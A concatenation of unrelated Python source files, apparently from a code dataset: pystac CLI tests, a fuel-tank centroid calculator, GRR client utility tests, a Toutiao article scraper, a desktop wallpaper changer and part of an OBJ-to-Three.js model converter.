cat2_dir = os.path.join(tmp_dir, 'second')
command = [
'copy', '-t', 'SELF_CONTAINED', '-a',
cat.get_self_href(), cat2_dir
]
self.run_command(command)
cat2 = pystac.read_file(os.path.join(cat2_dir, 'collection.json'))
for item in cat2.get_all_items():
item_href = item.get_self_href()
for asset in item.assets.values():
href = asset.href
self.assertFalse(is_absolute_href(href))
common_path = os.path.commonpath([
os.path.dirname(item_href),
make_absolute_href(href, item_href)
])
                    self.assertEqual(common_path, os.path.dirname(item_href))
def test_copy_using_publish_location(self):
cat = TestCases.planet_disaster()
href = "http://test.com"
with TemporaryDirectory() as tmp_dir:
cat.make_all_asset_hrefs_absolute()
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.ABSOLUTE_PUBLISHED)
cat2_dir = os.path.join(tmp_dir, 'second')
command = [
'copy', '-t', 'ABSOLUTE_PUBLISHED', '-a',
cat.get_self_href(), cat2_dir, '-l', href
]
self.run_command(command)
cat2 = pystac.read_file(os.path.join(cat2_dir, 'collection.json'))
for link in cat2.get_child_links():
self.assertTrue(cast(str, link.target).startswith(href))
def test_move_assets(self):
cat = TestCases.planet_disaster()
with TemporaryDirectory() as tmp_dir:
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.RELATIVE_PUBLISHED)
cat_href = cat.get_self_href()
command = ['move-assets', '-c', cat_href]
self.assertEqual(self.run_command(command).exit_code, 0)
cat2 = pystac.read_file(cat_href)
for item in cat2.get_all_items():
item_href = item.get_self_href()
for asset in item.assets.values():
href = asset.href
self.assertFalse(is_absolute_href(href))
common_path = os.path.commonpath([
os.path.dirname(item_href),
make_absolute_href(href, item_href)
])
self.assertEqual(common_path, os.path.dirname(item_href))
|
py | b40030173515912732fafb79760b045cf808d0aa | import math
volume = [10.865, 1.936, 2.376, 2.652, 2.64, 1.2]
x_p = [8.9130435, 6.9130435, -1.686957, 3.1130435, -5.286957, -2.086957]
y_p = [1.20652174, -1.39347826, 1.20652174, 0.60652174, -0.29347826, -1.49347826]
z_p = [0.61669004, 0.21669004, -0.28330996, -0.18330996, 0.41669004, 0.21669004]
x_len = [1.5, 2.2, 2.4, 1.7, 2.4, 2.4]
y_len = [0.9, 0.8, 1.1, 1.3, 1.2, 1]
z_len = [0.3, 1.1, 0.9, 1.2, 1, 0.5]
def cal_centroid(flag, v, angle):
"""
:param flag: 第几个油箱
:param v: 当前油箱中油的容积
:param angle: 飞行器当前角度
:return: (x, y, z)质心位置
"""
x0 = x_len[flag]
y0 = y_len[flag]
z0 = z_len[flag]
v0 = volume[flag]
TAN = math.fabs(math.tan(angle))
if angle == 0:
return x_p[flag] / 2, y_p[flag] / 2, (v * z0) / (2 * v0) + z_p[flag] / 2 - z0 / 2
elif angle > 0:
if TAN < z0 / x0:
if v < y0 * x0 ** 2 * TAN / 2:
return math.sqrt((2 * v) / (9 * y0 * TAN)) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (9 * y0)) + z_p[flag] / 2 - z0 / 2
elif (y0 * x0 ** 2 * TAN) / 2 < v < v0 - (y0 * x0 ** 2 * TAN) / 2:
return x0 ** 3 * TAN * y0 / (12 * v) + x_p[flag] / 2, y_p[flag] / 2, v / (2 * x0 * y0) + (
y0 * x0 ** 3 * TAN ** 2) / (24 * v) + z_p[flag] / 2 - z0 / 2
else:
return x0 / 2 + math.sqrt(2 * (v0 - v) ** 3 / (9 * v ** 2)) - x0 * y0 / (2 * v) + x_p[flag] / 2, y_p[
flag] / 2, z0 / 2 - v0 * z0 / (2 * v) + TAN * math.sqrt((v0 - v) ** 3 / (9 * v ** 2)) + z_p[
flag] / 2
else:
if v < y0 * x0 ** 2 / (2 * TAN):
return math.sqrt((2 * v) / (y0 * TAN * 9)) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (y0 * 9)) + z_p[flag] / 2 - z0 / 2
elif y0 * x0 ** 2 / (2 * TAN) < v < v0 - (y0 * z0 ** 2) / (2 * TAN):
return v / (2 * z0 * y0) + (y0 * z0 ** 3) / (24 * TAN ** 2) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, (
z0 ** 3 * y0) / (12 * v * TAN) + z_p[flag] / 2
else:
return x0 / 2 - (v0 * x0) / (2 * v) + TAN * math.sqrt((v0 - v) ** 3) / (3 * v) + x_p[flag] / 2, y_p[
flag] / 2, z0 / 2 + math.sqrt((v0 - v) ** 3) / (3 * v) + z_p[flag] / 2
else:
angle = -angle
if TAN < z0 / x0:
if v < y0 * x0 ** 2 * TAN / 2:
return x0 / 2 - 1 * math.sqrt((2 * v) / (9 * y0 * TAN)) + x_p[flag] / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (9 * y0)) + z_p[flag] / 2 - z0 / 2
elif (y0 * x0 ** 2 * TAN) / 2 < v < v0 - (y0 * x0 ** 2 * TAN) / 2:
                return -1 * x0 + x0 ** 3 * TAN * y0 / (12 * v) + x_p[flag] / 2, y_p[flag] / 2, v / (2 * x0 * y0) + (
                    y0 * x0 ** 3 * TAN ** 2) / (24 * v) + z_p[flag] / 2 - z0 / 2
else:
return -1 * math.sqrt(2 * (v0 - v) ** 3 / (9 * v ** 2)) + x0 * y0 / (2 * v) + x_p[flag] / 2 - x0 / 2, \
y_p[flag] / 2, z0 / 2 - v0 * z0 / (2 * v) + TAN * math.sqrt((v0 - v) ** 3 / (9 * v ** 2)) + z_p[
flag] / 2
else:
if v < y0 * x0 ** 2 / (2 * TAN):
return x0 / 2 - math.sqrt((2 * v) / (y0 * TAN * 9)) + x_p[flag] / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (y0 * 9)) + z_p[flag] / 2 - z0 / 2
elif y0 * x0 ** 2 / (2 * TAN) < v < v0 - (y0 * z0 ** 2) / (2 * TAN):
return x0 / 2 - v / (2 * z0 * y0) - (y0 * z0 ** 3) / (24 * TAN ** 2) + x_p[flag] / 2, y_p[flag] / 2, - (
z0 ** 3 * y0) / (12 * v * TAN) + z_p[flag] / 2
else:
return (v0 * x0) / (2 * v) - TAN * math.sqrt((v0 - v) ** 3) / (3 * v) + x_p[flag] / 2 - x0 / 2, y_p[
flag] / 2, z0 / 2 + math.sqrt((v0 - v) ** 3) / (3 * v) + z_p[flag] / 2
if __name__ == '__main__':
print(cal_centroid(0, 0.3, 0.00046845))
|
py | b400304fea5b0745d67b97243aea326b061b2c8f | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test client utility functions."""
import hashlib
import io
import os
import platform
import unittest
from unittest import mock
from absl import app
from absl.testing import absltest
from grr_response_client import client_utils
from grr_response_client import client_utils_common
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.util import filesystem
from grr_response_core.lib.util import temp
from grr.test_lib import test_lib
class IsExecutionAllowedTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.is_execution_allowed = client_utils_common.IsExecutionAllowed
def testAllowsOnlyConfiguredCommands(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": ["/usr/bin/foo"],
}):
self.assertTrue(self.is_execution_allowed("/usr/bin/foo", []))
self.assertFalse(self.is_execution_allowed("/usr/bin/bar", []))
def testAllowsOnlyConfiguredCommandsWithArgs(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": [
"/bin/foo --bar --baz",
"/bin/foo --quux",
],
}):
self.assertTrue(self.is_execution_allowed("/bin/foo", ["--bar", "--baz"]))
self.assertTrue(self.is_execution_allowed("/bin/foo", ["--quux"]))
self.assertFalse(self.is_execution_allowed("/bin/foo", ["--norf"]))
def testAllowsOnlyConfiguredCommandsWithSimpleQuotes(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": ["'foo bar' 'baz quux'"],
}):
self.assertTrue(self.is_execution_allowed("foo bar", ["baz quux"]))
self.assertFalse(self.is_execution_allowed("foo bar", ["baz", "quux"]))
self.assertFalse(self.is_execution_allowed("foo", ["bar", "baz quux"]))
self.assertFalse(self.is_execution_allowed("foo", ["bar", "baz", "quux"]))
def testAllowsOnlyConfiguredCommandsWithComplexQuotes(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": [
"'/foo bar/\"quux norf\"/thud' -x '1 3 3 7' -y \"42\"",
],
}):
command = "/foo bar/\"quux norf\"/thud"
args = ["-x", "1 3 3 7", "-y", "42"]
self.assertTrue(self.is_execution_allowed(command, args))
class ClientUtilsTest(test_lib.GRRBaseTest):
"""Test the client utils."""
@unittest.skipIf(platform.system() != "Windows", "Windows only test.")
def testWinSplitPathspec(self):
# pylint: disable=g-import-not-at-top
from grr_response_client import client_utils_windows
# pylint: enable=g-import-not-at-top
raw_pathspec, path = client_utils_windows.GetRawDevice("C:\\")
self.assertStartsWith(raw_pathspec.path, "\\\\?\\Volume{")
self.assertEqual("/", path)
def testExecutionAllowlist(self):
"""Test if unknown commands are filtered correctly."""
# ls is not allowed
if platform.system() == "Windows":
cmd = "dir", []
else:
cmd = "ls", ["."]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, -1)
self.assertEqual(stdout, b"")
self.assertEqual(stderr, b"Execution disallowed by allowlist.")
# "echo 1" is
if platform.system() == "Windows":
cmd = "cmd.exe", ["/C", "echo 1"]
else:
cmd = "/bin/echo", ["1"]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, 0)
self.assertEqual(stdout, "1{}".format(os.linesep).encode("utf-8"))
self.assertEqual(stderr, b"")
# but not "echo 11"
if platform.system() == "Windows":
cmd = "cmd.exe", ["/C", "echo 11"]
else:
cmd = "/bin/echo", ["11"]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, -1)
self.assertEqual(stdout, b"")
self.assertEqual(stderr, b"Execution disallowed by allowlist.")
def AppendTo(self, list_obj, element):
list_obj.append(element)
def testExecutionTimeLimit(self):
"""Test if the time limit works."""
_, _, _, time_used = client_utils_common.Execute("/bin/sleep", ["10"], 0.1)
# This should take just a bit longer than 0.1 seconds.
self.assertLess(time_used, 1.0)
@unittest.skipIf(platform.system() != "Darwin", "Skipping macOS only test.")
@mock.patch(
"grr_response_client.client_utils_osx"
".platform.mac_ver",
return_value=("10.8.1", ("", "", ""), "x86_64"))
class OSXVersionTests(test_lib.GRRBaseTest):
def testVersionAsIntArray(self, _):
from grr_response_client import client_utils_osx # pylint: disable=g-import-not-at-top
osversion = client_utils_osx.OSXVersion()
self.assertEqual(osversion.VersionAsMajorMinor(), [10, 8])
def testVersionString(self, _):
from grr_response_client import client_utils_osx # pylint: disable=g-import-not-at-top
osversion = client_utils_osx.OSXVersion()
self.assertEqual(osversion.VersionString(), "10.8.1")
class MultiHasherTest(absltest.TestCase):
@staticmethod
def _GetHash(hashfunc, data):
hasher = hashfunc()
hasher.update(data)
return hasher.digest()
def testHashBufferSingleInput(self):
hasher = client_utils_common.MultiHasher()
hasher.HashBuffer(b"foo")
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foo")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foo"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foo"))
self.assertEqual(hash_object.sha256, self._GetHash(hashlib.sha256, b"foo"))
def testHashBufferMultiInput(self):
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashBuffer(b"foo")
hasher.HashBuffer(b"bar")
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foobar")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foobar"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foobar"))
self.assertFalse(hash_object.sha256)
def testHashFileWhole(self):
with temp.AutoTempFilePath() as tmp_path:
with io.open(tmp_path, "wb") as tmp_file:
tmp_file.write(b"foobar")
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashFilePath(tmp_path, len(b"foobar"))
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foobar")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foobar"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foobar"))
self.assertFalse(hash_object.sha256)
def testHashFilePart(self):
with temp.AutoTempFilePath() as tmp_path:
with io.open(tmp_path, "wb") as tmp_file:
tmp_file.write(b"foobar")
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashFilePath(tmp_path, len(b"foo"))
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foo")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foo"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foo"))
self.assertFalse(hash_object.sha256)
def testHashBufferProgress(self):
progress = mock.Mock()
hasher = client_utils_common.MultiHasher(progress=progress)
hasher.HashBuffer(os.urandom(108))
self.assertTrue(progress.called)
self.assertEqual(hasher.GetHashObject().num_bytes, 108)
def testStatResultFromStatEntry(self):
stat_obj = os.stat_result([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
fs_stat = filesystem.Stat("/foo", stat_obj)
pathspec = rdf_paths.PathSpec(path="/foo", pathtype="OS")
stat_entry = client_utils.StatEntryFromStat(
fs_stat, pathspec, ext_attrs=False)
self.assertEqual(stat_obj, client_utils.StatResultFromStatEntry(stat_entry))
class GetRawDeviceTest(absltest.TestCase):
def testGetRawDevice(self):
if platform.system() == "Windows":
path = "C:\\"
else:
path = "/"
result, _ = client_utils.GetRawDevice(path)
self.assertTrue(result.path)
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
py | b4003057190e20de7a07707524fba0c379b4bfe1 | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: toutiao_m.py
@time: 2018-02-28 14:14
"""
import hashlib
import math
import re
import time
import execjs
from tools.char import un_escape
def get_as_cp():
t = int(math.floor(time.time()))
e = hex(t).upper()[2:]
m = hashlib.md5()
m.update(str(t).encode(encoding='utf-8'))
i = m.hexdigest().upper()
if len(e) != 8:
AS = '479BB4B7254C150'
CP = '7E0AC8874BB0985'
return AS, CP
n = i[0:5]
a = i[-5:]
s = ''
r = ''
for o in range(5):
s += n[o] + e[o]
r += e[o + 3] + a[o]
AS = 'A1' + s + e[-3:]
CP = e[0:3] + r + 'E1'
return AS, CP
# fixme
def parse_toutiao_article_info():
pass
def parse_toutiao_js_body(html_body, url=''):
"""
解析js
:param html_body:
:param url:
:return:
"""
rule = r'<script>(var BASE_DATA = {.*?};)</script>'
js_list = re.compile(rule, re.S).findall(html_body)
if not js_list:
print('parse error url: %s' % url)
print(html_body)
return ''.join(js_list)
class ParseJsTt(object):
"""
解析头条动态数据
"""
def __init__(self, js_body):
self.js_body = js_body
self._add_js_item_id_fn()
self._add_js_title_fn()
self._add_js_abstract_fn()
self._add_js_content_fn()
self._add_js_pub_time()
self._add_js_tags_fn()
self.ctx = execjs.compile(self.js_body)
def _add_js_item_id_fn(self):
js_item_id_fn = """
function r_item_id() {
return BASE_DATA.articleInfo.itemId;
};
"""
self.js_body += js_item_id_fn
def _add_js_title_fn(self):
js_title_fn = """
function r_title() {
return BASE_DATA.articleInfo.title;
};
"""
self.js_body += js_title_fn
def _add_js_abstract_fn(self):
js_abstract_fn = """
function r_abstract() {
return BASE_DATA.shareInfo.abstract;
};
"""
self.js_body += js_abstract_fn
def _add_js_content_fn(self):
js_content_fn = """
function r_content() {
return BASE_DATA.articleInfo.content;
};
"""
self.js_body += js_content_fn
def _add_js_pub_time(self):
js_pub_time_fn = """
function r_pub_time() {
return BASE_DATA.articleInfo.subInfo.time;
};
"""
self.js_body += js_pub_time_fn
def _add_js_tags_fn(self):
js_tags_fn = """
function r_tags() {
return BASE_DATA.articleInfo.tagInfo.tags;
};
"""
self.js_body += js_tags_fn
def parse_js_item_id(self):
return self.ctx.call('r_item_id') or ''
def parse_js_title(self):
return self.ctx.call('r_title') or ''
def parse_js_abstract(self):
return self.ctx.call('r_abstract') or ''
def parse_js_content(self):
return un_escape(self.ctx.call('r_content')) or ''
def parse_js_pub_time(self):
return self.ctx.call('r_pub_time') or time.strftime('%Y-%m-%d %H:%M:%S')
def parse_js_tags(self):
return ','.join([tag['name'] or '' for tag in self.ctx.call('r_tags')])
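# --- Illustrative usage sketch (html_body is a previously fetched article page) ---
#
#     js_body = parse_toutiao_js_body(html_body, url)
#     parser = ParseJsTt(js_body)
#     title, content = parser.parse_js_title(), parser.parse_js_content()
#     pub_time, tags = parser.parse_js_pub_time(), parser.parse_js_tags()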
if __name__ == '__main__':
print(get_as_cp())
|
py | b40031c141980800e8505da2173e67aeb6bfd83a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Supported desktop environments
# - gnome (Unity, Gnome 3)
# - fluxbox (Fluxbox, Openbox, JWM, AfterStep)
try:
# Python 2
from urllib2 import urlopen
except ImportError:
# Python 3
from urllib.request import urlopen
try:
# Python 2
from urllib import quote_plus
except ImportError:
# Python 3
from urllib.parse import quote_plus
import os
import sys
import json
import random
import subprocess
# Default settings, create settings.ini file instead of editing this file
wallpaperGetUrls = ["http://www.mylittlewallpaper.com/c/all/api/v2/" +
"random.json?size=2&limit=1"]
desktopEnvironment = "gnome"
wallpaperSaveFolder = "wallpapers"
favouritesUsername = ""
favouritesToken = ""
# Change to current directory
dirName = os.path.dirname(os.path.realpath(__file__))
os.chdir(dirName)
if os.path.exists("settings.ini"):
try:
import ConfigParser as cParser
except ImportError:
import configparser as cParser
config = cParser.ConfigParser()
config.read("settings.ini")
if config.has_option("MyLittleWallpaperChanger", "wallpaperGetUrls"):
urlsString = config.get("MyLittleWallpaperChanger", "wallpaperGetUrls")
wallpaperGetUrls = urlsString.split(" ")
desktopEnvironment = config.get("MyLittleWallpaperChanger",
"desktopEnvironment")
wallpaperSaveFolder = config.get("MyLittleWallpaperChanger",
"wallpaperSaveFolder")
if config.has_option("MyLittleWallpaperChanger", "favouritesUsername"):
favouritesUsername = config.get("MyLittleWallpaperChanger",
"favouritesUsername")
if config.has_option("MyLittleWallpaperChanger", "favouritesToken"):
favouritesToken = config.get("MyLittleWallpaperChanger",
"favouritesToken")
if favouritesUsername and favouritesToken:
import hashlib
import uuid
requestId = uuid.uuid4().hex
urlHash = hashlib.sha256(str(favouritesUsername + favouritesToken +
requestId).encode('utf-8')).hexdigest()
wallpaperGetUrls = ["http://www.mylittlewallpaper.com/c/all/api/v2/" +
"favourites.json?limit=1&sort=random&requestId=" +
requestId + "&userName=" +
quote_plus(favouritesUsername) + "&hash=" + urlHash]
def getWallpaper():
if not os.path.exists(wallpaperSaveFolder):
os.makedirs(wallpaperSaveFolder)
random.shuffle(wallpaperGetUrls)
wallpaperGetUrl = wallpaperGetUrls[0]
# Fetch json from server
try:
jsonData = json.loads(urlopen(wallpaperGetUrl, timeout=60).read().
decode('utf-8'))
except Exception as e:
print(e)
return ""
# Check if json contains a wallpaper
for wallpaper in jsonData["result"]:
fullImageUrl = wallpaper["fullImageURL"]
imageName = os.path.basename(fullImageUrl)
if not os.path.exists(os.path.join(wallpaperSaveFolder, imageName)):
try:
imageData = urlopen(fullImageUrl, timeout=60).read()
if len(imageData) > 0:
fileHandler = open(os.path.join(wallpaperSaveFolder,
imageName), "wb")
fileHandler.write(imageData)
fileHandler.close()
else:
raise Exception("Empty file, exiting")
except Exception as e:
print(e)
return ""
return imageName
return ""
def changeWallpaper(wallpaperUri):
# Todo: Add support for other desktop environments
try:
if desktopEnvironment == "gnome":
os.system("gsettings set org.gnome.desktop.background " +
"picture-uri '%s'" % (wallpaperUri))
elif desktopEnvironment == "fluxbox":
try:
subprocess.Popen(["fbsetbg", wallpaperUri])
except:
sys.stderr.write("Failed to set desktop wallpaper. Please " +
"install fbsetbg.")
else:
sys.stderr.write("Failed to set desktop wallpaper. Unsupported " +
"desktop environment.")
return False
return True
except Exception as e:
print(e)
return False
wallpaperFilename = getWallpaper()
if wallpaperFilename:
filePath = os.path.abspath(os.path.join(wallpaperSaveFolder,
wallpaperFilename))
changeWallpaper("file://" + filePath)
|
py | b40032fde80056bfcd364dd1051f2b056827154b | """Convert Wavefront OBJ / MTL files into Three.js (JSON model version, to be used with web worker based ascii / binary loader)
-------------------------
How to use this converter
-------------------------
python convert_obj_three.py -i infile.obj -o outfile.js [-m "morphfiles*.obj"] [-c "morphcolors*.obj"] [-a center|centerxz|top|bottom|none] [-s smooth|flat] [-t ascii|binary] [-d invert|normal] [-b] [-e]
Notes:
- flags
-i infile.obj input OBJ file
-o outfile.js output JS file
-m "morphfiles*.obj" morph OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-c "morphcolors*.obj" morph colors OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-a center|centerxz|top|bottom|none model alignment
-s smooth|flat smooth = export vertex normals, flat = no normals (face normals computed in loader)
-t ascii|binary export ascii or binary format (ascii has more features, binary just supports vertices, faces, normals, uvs and materials)
-d invert|normal invert transparency
-b bake material colors into face colors
-e export edges
-x 10.0 scale and truncate
-f 2 morph frame sampling step
- by default:
use smooth shading (if there were vertex normals in the original model)
will be in ASCII format
original model is assumed to use non-inverted transparency / dissolve (0.0 fully transparent, 1.0 fully opaque)
no face colors baking
no edges export
no scale and truncate
morph frame step = 1 (all files will be processed)
- binary conversion will create two files:
outfile.js (materials)
outfile.bin (binary buffers)
--------------------------------------------------
How to use generated JS file in your HTML document
--------------------------------------------------
<script type="text/javascript" src="Three.js"></script>
...
<script type="text/javascript">
...
// load ascii model
var jsonLoader = new THREE.JSONLoader();
jsonLoader.load( { model: "Model_ascii.js", callback: function( geometry ) { createScene( geometry) } } );
// load binary model
var binLoader = new THREE.BinaryLoader();
binLoader.load( { model: "Model_bin.js", callback: function( geometry ) { createScene( geometry) } } );
function createScene( geometry ) {
var mesh = new THREE.Mesh( geometry, new THREE.MeshFaceMaterial() );
}
...
</script>
-------------------------------------
Parsers based on formats descriptions
-------------------------------------
http://en.wikipedia.org/wiki/Obj
http://en.wikipedia.org/wiki/Material_Template_Library
-------------------
Current limitations
-------------------
- for the moment, only diffuse color and texture are used
(will need to extend shaders / renderers / materials in Three)
- texture coordinates can be wrong in canvas renderer
(there is crude normalization, but it doesn't
work for all cases)
- smoothing can be turned on/off only for the whole mesh
----------------------------------------------
How to get proper OBJ + MTL files with Blender
----------------------------------------------
0. Remove default cube (press DEL and ENTER)
1. Import / create model
2. Select all meshes (Select -> Select All by Type -> Mesh)
3. Export to OBJ (File -> Export -> Wavefront .obj) [*]
- enable following options in exporter
Material Groups
Rotate X90
Apply Modifiers
High Quality Normals
Copy Images
Selection Only
Objects as OBJ Objects
UVs
Normals
Materials
Edges
- select empty folder
- give your exported file name with "obj" extension
- click on "Export OBJ" button
4. Your model is now all files in this folder (OBJ, MTL, number of images)
- this converter assumes all files staying in the same folder,
(OBJ / MTL files use relative paths)
- for WebGL, textures must be power of 2 sized
[*] If OBJ export fails (Blender 2.54 beta), patch your Blender installation
following instructions here:
http://www.blendernation.com/2010/09/12/blender-2-54-beta-released/
------
Author
------
AlteredQualia http://alteredqualia.com
"""
import fileinput
import operator
import random
import os.path
import getopt
import sys
import struct
import math
import glob
# #####################################################
# Configuration
# #####################################################
ALIGN = "none" # center centerxz bottom top none
SHADING = "smooth" # smooth flat
TYPE = "ascii" # ascii binary
TRANSPARENCY = "normal" # normal invert
TRUNCATE = False
SCALE = 1.0
FRAMESTEP = 1
BAKE_COLORS = False
EXPORT_EDGES = False
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# #####################################################
# Templates
# #####################################################
TEMPLATE_FILE_ASCII = u"""\
// Converted from: %(fname)s
// vertices: %(nvertex)d
// faces: %(nface)d
// normals: %(nnormal)d
// colors: %(ncolor)d
// uvs: %(nuv)d
// materials: %(nmaterial)d
// edges: %(nedge)d
//
// Generated with OBJ -> Three.js converter
// http://github.com/alteredq/three.js/blob/master/utils/exporters/convert_obj_three.py
var model = {
"version" : 2,
"scale" : %(scale)f,
"materials": [%(materials)s],
"vertices": [%(vertices)s],
"morphTargets": [%(morphTargets)s],
"morphColors": [%(morphColors)s],
"normals": [%(normals)s],
"colors": [%(colors)s],
"uvs": [[%(uvs)s]],
"faces": [%(faces)s],
"edges" : [%(edges)s]
};
postMessage( model );
close();
"""
TEMPLATE_FILE_BIN = u"""\
// Converted from: %(fname)s
// vertices: %(nvertex)d
// faces: %(nface)d
// materials: %(nmaterial)d
//
// Generated with OBJ -> Three.js converter
// http://github.com/alteredq/three.js/blob/master/utils/exporters/convert_obj_three.py
var model = {
"version" : 1,
"materials": [%(materials)s],
"buffers": "%(buffers)s"
};
postMessage( model );
close();
"""
TEMPLATE_VERTEX = "%f,%f,%f"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%.5g,%.5g,%.5g"
TEMPLATE_UV = "%.5g,%.5g"
TEMPLATE_COLOR = "%.3g,%.3g,%.3g"
TEMPLATE_COLOR_DEC = "%d"
TEMPLATE_EDGE = "%d,%d"
TEMPLATE_MORPH_VERTICES = '\t{ "name": "%s", "vertices": [%s] }'
TEMPLATE_MORPH_COLORS = '\t{ "name": "%s", "colors": [%s] }'
# #####################################################
# Utils
# #####################################################
def file_exists(filename):
"""Return true if file exists and is accessible for reading.
Should be safer than just testing for existence due to links and
permissions magic on Unix filesystems.
@rtype: boolean
"""
try:
f = open(filename, 'r')
f.close()
return True
except IOError:
return False
def get_name(fname):
"""Create model name based of filename ("path/fname.js" -> "fname").
"""
return os.path.splitext(os.path.basename(fname))[0]
def bbox(vertices):
"""Compute bounding box of vertex array.
"""
if len(vertices)>0:
minx = maxx = vertices[0][0]
miny = maxy = vertices[0][1]
minz = maxz = vertices[0][2]
for v in vertices[1:]:
if v[0]<minx:
minx = v[0]
elif v[0]>maxx:
maxx = v[0]
if v[1]<miny:
miny = v[1]
elif v[1]>maxy:
maxy = v[1]
if v[2]<minz:
minz = v[2]
elif v[2]>maxz:
maxz = v[2]
return { 'x':[minx,maxx], 'y':[miny,maxy], 'z':[minz,maxz] }
else:
return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
def translate(vertices, t):
"""Translate array of vertices by vector t.
"""
for i in xrange(len(vertices)):
vertices[i][0] += t[0]
vertices[i][1] += t[1]
vertices[i][2] += t[2]
def center(vertices):
"""Center model (middle of bounding box).
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0] + (bb['y'][1] - bb['y'][0])/2.0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def top(vertices):
"""Align top of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][1]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def bottom(vertices):
"""Align bottom of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def centerxz(vertices):
"""Center model around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = 0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def normalize(v):
"""Normalize 3d vector"""
l = math.sqrt(v[0]*v[0] + v[1]*v[1] + v[2]*v[2])
if l:
v[0] /= l
v[1] /= l
v[2] /= l
def veckey3(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
# #####################################################
# MTL parser
# #####################################################
def texture_relative_path(fullpath):
texture_file = os.path.basename(fullpath)
return texture_file
def parse_mtl(fname):
"""Parse MTL file.
"""
materials = {}
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Material start
# newmtl identifier
if chunks[0] == "newmtl" and len(chunks) == 2:
identifier = chunks[1]
if not identifier in materials:
materials[identifier] = {}
# Diffuse color
# Kd 1.000 1.000 1.000
if chunks[0] == "Kd" and len(chunks) == 4:
materials[identifier]["colorDiffuse"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Ambient color
# Ka 1.000 1.000 1.000
if chunks[0] == "Ka" and len(chunks) == 4:
materials[identifier]["colorAmbient"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular color
# Ks 1.000 1.000 1.000
if chunks[0] == "Ks" and len(chunks) == 4:
materials[identifier]["colorSpecular"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular coefficient
# Ns 154.000
if chunks[0] == "Ns" and len(chunks) == 2:
materials[identifier]["specularCoef"] = float(chunks[1])
# Transparency
# Tr 0.9 or d 0.9
if (chunks[0] == "Tr" or chunks[0] == "d") and len(chunks) == 2:
if TRANSPARENCY == "invert":
materials[identifier]["transparency"] = 1.0 - float(chunks[1])
else:
materials[identifier]["transparency"] = float(chunks[1])
# Optical density
# Ni 1.0
if chunks[0] == "Ni" and len(chunks) == 2:
materials[identifier]["opticalDensity"] = float(chunks[1])
# Diffuse texture
# map_Kd texture_diffuse.jpg
